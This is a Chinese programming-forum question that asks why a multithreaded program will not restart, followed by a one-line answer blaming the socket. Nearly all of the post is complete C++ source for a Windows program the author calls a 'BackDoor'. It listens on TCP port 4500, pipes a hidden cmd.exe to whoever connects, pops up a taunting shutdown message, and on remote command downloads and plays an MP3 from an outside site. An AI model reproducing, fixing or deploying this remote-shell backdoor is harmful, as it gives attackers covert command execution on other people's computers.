多线程程序运行一次,关了之后,第二次就打不开了
// TwoPipeDoor.cpp : Defines the entry point for the application.多线程
//
#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
#include <Urlmon.h>
#pragma comment(lib,"urlmon.lib")
#pragma comment(lib,"winmm.lib") //mciSendString的头文件
#include <mmsystem.h> //mciSendString的头文件
#include <direct.h> //创建文件夹的头文件
#include<direct.h>
#include <shellapi.h>
SOCKET sListen,sClient;
//定义管道句柄
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
void audio(char MusicName[MAX_PATH])
{
char syspath[MAX_PATH];
memset(syspath, 0, MAX_PATH);
GetWindowsDirectory(syspath, MAX_PATH);
char path[MAX_PATH];
memset(path, 0, MAX_PATH);
wsprintf(path, "%s\\Media\\%s", syspath, MusicName);
char shortname[MAX_PATH];
memset(shortname, 0, MAX_PATH);
GetShortPathName(path, shortname, MAX_PATH);
char cmd[MAX_PATH];
memset(cmd, 0, MAX_PATH);
wsprintf(cmd, "play %s wait", shortname);
mciSendString(cmd, "", 0, NULL);
//Sleep(150000);
}
//判断文件是否存在
BOOL FileExists(LPCTSTR lpszFileName)
{
//得到文件属性
DWORD dwAttributes=GetFileAttributes(lpszFileName);
//函数调用成功则文件存在
if(dwAttributes==0xffffffff)
{
return false;
}
//否则文件不存在
else
{
return true;
}
}
//http下载文件
void download(char *Url,char *FilePath)
{
//删除已有文件
if(DeleteFile(FilePath))
{
printf("文件已存在,并且无法删除\n");
}
//下载文件
URLDownloadToFile(0,Url,FilePath,0,0);
//判断文件存不存在,以确定下载成有与否
if(FileExists(FilePath))
{
printf("文件下载成功\n%s\n\n", FilePath);
}
else
{
printf("文件下载失败\n%s\n\n", FilePath);
}
}
DWORD WINAPI Thread3( LPVOID lpParam )
{
MessageBox(NULL, TEXT("李建锋对你执行了关机命令!!!黑客编程雄起!!!"), TEXT("消息"), 0);
while(true)
{
char buff[MAX_PATH];
memset(buff, 0, MAX_PATH);
recv(sClient ,buff,MAX_PATH,0);
if(! strcmp(buff, "点歌"))
{
char Url[MAX_PATH] = "http://images1.fotop.net/albums6/waiyee/The_Peak/Goodbye_Police.mp3";
char FilePath[MAX_PATH];
memset(FilePath, 0, MAX_PATH); //声明数组之后的清理操作,防止数组出错
char moduleFileName[MAX_PATH];
memset(moduleFileName, 0, MAX_PATH);
GetModuleFileNameA(NULL, moduleFileName, MAX_PATH); //取得当前运行程序的路径(包括当前程序也在获得的路径当中)
char * p = strrchr(moduleFileName, '\\'); //从后往前找的数组moduleFileName中的第一个 \\
*p=0x00; //给数组moduleFileName的从后往前的第一个\\替换为0x00(0)
wsprintf(FilePath, "%s\\Goodbye_Police.mp3", moduleFileName);//往数组中合并字符串
download(Url, FilePath); //下载音乐
char shortname[MAX_PATH];
GetShortPathName(FilePath,shortname,MAX_PATH);//szFile就是路径,shortname就是Windows要转换成的简单路径名字
MessageBox(NULL, TEXT("《再见警察》好感人的歌,听听吧!!!点击开始播放。。。。。。 "), TEXT("我是你哥"), MB_ICONASTERISK);
char cmd[MAX_PATH + 10];
memset(cmd, 0, 255);
wsprintf(cmd, "play %s wait", shortname);
if(FileExists(FilePath))
{
mciSendString(cmd , "", 0, NULL);
}
else
{
MessageBox(NULL, TEXT("无法播放"), TEXT("无法播放"), 0);
}
}
}
return 0;
}
DWORD WINAPI Thread2(LPVOID lpParam)
{
SECURITY_ATTRIBUTES sa;
DWORD nByteToWrite, nByteWritten;
char recv_buff[1024];
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
//创建管道
CreatePipe(&hReadPipe,&hWriteFile,&sa,0);
while(true)
{
Sleep(250);
//接受远程cmd命令
nByteToWrite = recv(sClient ,recv_buff,1024,0);
//写入管道
WriteFile(hWriteFile,recv_buff,nByteToWrite,&nByteWritten,NULL);
}
return 0;
}
//读取管道1中的数据,返回给远程主机
DWORD WINAPI Thread1( LPVOID lpParam )
{
SECURITY_ATTRIBUTES sa;
DWORD len;
char send_buff[2048];
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
CreatePipe(&hReadFile,&hWritePipe,&sa,0);
while (true)
{
//读取管道中的数据
ReadFile(hReadFile,send_buff,2048,&len,NULL);
//把管道中的数据发送给远程主机
send(sClient,send_buff,len,0);
}
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char wMessage[512] = "\r\n======================== BackDoor by 认真的雪 ========================\r\n";
HANDLE hThread[3];
DWORD dwThreadIdA,dwThreadIdB;
PROCESS_INFORMATION pi;
STARTUPINFO si;
//初始化socket,并绑定本地端口监听
BYTE minorVer = 2;
BYTE majorVer = 2;
WSADATA wsaData;
WORD sockVersion = MAKEWORD(minorVer, majorVer);
if(WSAStartup(sockVersion, &wsaData) != 0)
return 0;
sListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sListen == INVALID_SOCKET)
{
printf("socket error \n");
return 0;
}
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(4500);
sin.sin_addr.S_un.S_addr = INADDR_ANY;
if(bind(sListen, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error \n");
return 0;
}
if(listen(sListen, 2) == SOCKET_ERROR)
{
printf("listen error \n");
return 0;
}
//接收连接
sClient = accept(sListen, NULL, NULL);
//创建两个进程,用于读取写入管道中的数据,实现通信
hThread[0]=CreateThread(NULL, 0, Thread1, NULL, 0, &dwThreadIdA);
hThread[1]=CreateThread(NULL, 0, Thread2, NULL, 0, &dwThreadIdB);
//hThread[2]=CreateThread(NULL, 0, Thread3, NULL, 0, &dwThreadIdC);
hThread[2]=CreateThread(NULL, 0, Thread3, NULL, 0, 0);
//暂停1秒,为了确保两个线程中的管道创建完毕,因为下面要对管道进行操作
Sleep(1000);
GetStartupInfo(&si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
//使cmd的输入输出和管道关联
si.hStdInput = hReadPipe;
si.hStdError = hWritePipe;
si.hStdOutput = hWritePipe;
si.wShowWindow = SW_HIDE;
char cmdline[256]={0};
//得到系统路径
GetSystemDirectory(cmdline,sizeof(cmdline));
strcat(cmdline,"\\cmd.exe");
//创建cmd进程
if (CreateProcess(cmdline, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) == 0)
{
printf ("CreateProcess Error \n");
return 0;
}
//发送欢迎信息
send(sClient ,wMessage,strlen(wMessage),0);
//等待线程结束
WaitForMultipleObjects(3,hThread,true,INFINITE);
return 0;
}
[解决办法]
大半是socket问题。等3分钟之后再启动